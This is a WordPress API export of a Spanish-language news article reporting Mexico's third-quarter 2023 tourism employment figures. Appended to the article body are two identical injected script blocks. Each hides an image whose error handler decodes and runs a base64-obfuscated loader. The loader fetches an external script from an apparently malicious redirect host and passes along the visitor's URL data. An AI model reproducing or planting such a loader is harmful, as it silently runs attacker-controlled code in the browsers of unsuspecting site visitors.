{"id":3419,"date":"2023-12-12T10:15:51","date_gmt":"2023-12-12T13:15:51","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3419"},"modified":"2025-08-14T00:03:30","modified_gmt":"2025-08-14T03:03:30","slug":"empleo-turistico-en-mexico-asciende-a-4-millones-764-mil-personas-en-el-tercer-trimestre-de-2023","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3419","title":{"rendered":"Empleo tur\u00edstico en M\u00e9xico asciende a 4 millones 764 mil personas en el tercer trimestre de 2023"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background\"><em>El secretario de Turismo, Miguel Torruco Marqu\u00e9s, inform\u00f3 que esta cifra significa un incremento de 1.1% respecto al trimestre previo, y represent\u00f3 9% del empleo nacional<\/em><\/h4>\n\n\n\n<p>El secretario de Turismo del Gobierno de M\u00e9xico, Miguel Torruco Marqu\u00e9s, inform\u00f3 que la poblaci\u00f3n ocupada en el sector tur\u00edstico en M\u00e9xico ascendi\u00f3 a 4 millones 764 mil personas empleadas en el tercer trimestre de 2023.<\/p>\n\n\n\n<p>El titular de la Secretar\u00eda de Turismo (Sectur) indic\u00f3 que en el periodo julio-septiembre de 2023, el empleo tur\u00edstico represent\u00f3 el 9% del empleo nacional.<\/p>\n\n\n\n<p>Destac\u00f3 que la recuperaci\u00f3n en el empleo tur\u00edstico&nbsp;se mantiene al mostrar,&nbsp;de julio a septiembre de 2023, un crecimiento de 1.1%,&nbsp;lo que equivale&nbsp;a 51 mil 231 personas empleadas m\u00e1s, comparadas con las 4 millones 713 mil personas empleadas en el trimestre previo.<\/p>\n\n\n\n<p>Torruco Marqu\u00e9s se\u00f1al\u00f3 que en su comparativo anual, se observ\u00f3 un incremento de 211 mil 921 personas empleadas&nbsp;m\u00e1s&nbsp;en el sector productor de bienes y servicios tur\u00edsticos,&nbsp;lo que representa&nbsp;un crecimiento de 4.7% respecto al tercer trimestre de 2022.<\/p>\n\n\n\n<p>Subray\u00f3 que el empleo tur\u00edstico al tercer trimestre de 2023 super\u00f3 en 6.2%, esto es 276 mil 669 personas, a la cifra hist\u00f3rica registrada del personal ocupado en el sector tur\u00edstico al primer trimestre de 2020, previo a la pandemia, cuando se registraron 4 millones 487 mil personas empleadas.<\/p>\n\n\n\n<p>El c\u00e1lculo del Empleo Tur\u00edstico al tercer trimestre de 2023 se realiz\u00f3 con base en la Encuesta Nacional de Ocupaci\u00f3n y Empleo (Nueva edici\u00f3n) (ENOEN) del INEGI y a la metodolog\u00eda aprobada por el Comit\u00e9 T\u00e9cnico Especializado de Estad\u00edsticas Econ\u00f3micas del Sector Turismo (CTEEEST), integrado por el INEGI, la Secretar\u00eda del Trabajo y Previsi\u00f3n Social (STPS), el Instituto Mexicano del Seguro Social (IMSS) y&nbsp;Sectur.<\/p>\n\n\n\n<p>Al destacar el constante crecimiento del empleo en el sector tur\u00edstico de M\u00e9xico, el titular del Sectur resalt\u00f3 la importancia de la iniciativa privada, integrada por micro, peque\u00f1as y medianas empresas, hasta grandes corporativos, como generadores de productos y servicios tur\u00edsticos, gracias a la estrecha colaboraci\u00f3n con los tres \u00f3rdenes de gobierno, y as\u00ed generar m\u00e1s fuentes de empleos para las personas en el sector tur\u00edstico.<\/p>\n\n\n\n<p>De esta forma, tambi\u00e9n se impulsa la derrama econ\u00f3mica en las 270 plazas de vocaci\u00f3n tur\u00edstica de nuestro pa\u00eds, lo que favorece a la poblaci\u00f3n local, en el cumplimiento de la&nbsp;instrucci\u00f3n&nbsp;del presidente Andr\u00e9s Manuel L\u00f3pez Obrador, de hacer del turismo una herramienta de reconciliaci\u00f3n social.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/es.travel2latam.com\/news-86722-empleo-turistico-en-mexico-asciende-a-4-millones-764-mil-personas-en-el-tercer-trimestre-de-2023\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" width=\"362\" height=\"63\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/Captura-web_17-2-2023_114738_es.travel2latam.com_.jpeg\" alt=\"\" class=\"wp-image-2238\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/Captura-web_17-2-2023_114738_es.travel2latam.com_.jpeg 362w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/Captura-web_17-2-2023_114738_es.travel2latam.com_-300x52.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/02\/Captura-web_17-2-2023_114738_es.travel2latam.com_-356x63.jpeg 356w\" sizes=\"(max-width: 362px) 100vw, 362px\" \/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El secretario de Turismo, Miguel Torruco Marqu\u00e9s, inform\u00f3 que esta cifra significa un incremento de 1.1% respecto al trimestre previo, y represent\u00f3 9% del empleo nacional El secretario de Turismo del Gobierno de M\u00e9xico, Miguel Torruco Marqu\u00e9s, inform\u00f3 que la poblaci\u00f3n ocupada en el sector tur\u00edstico en M\u00e9xico ascendi\u00f3 a 4 millones 764 mil personas [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3420,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[22],"tags":[],"class_list":{"0":"post-3419","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-internacional"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3419"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3419"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3419\/revisions"}],"predecessor-version":[{"id":6893,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3419\/revisions\/6893"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3420"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3419"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3419"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3419"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}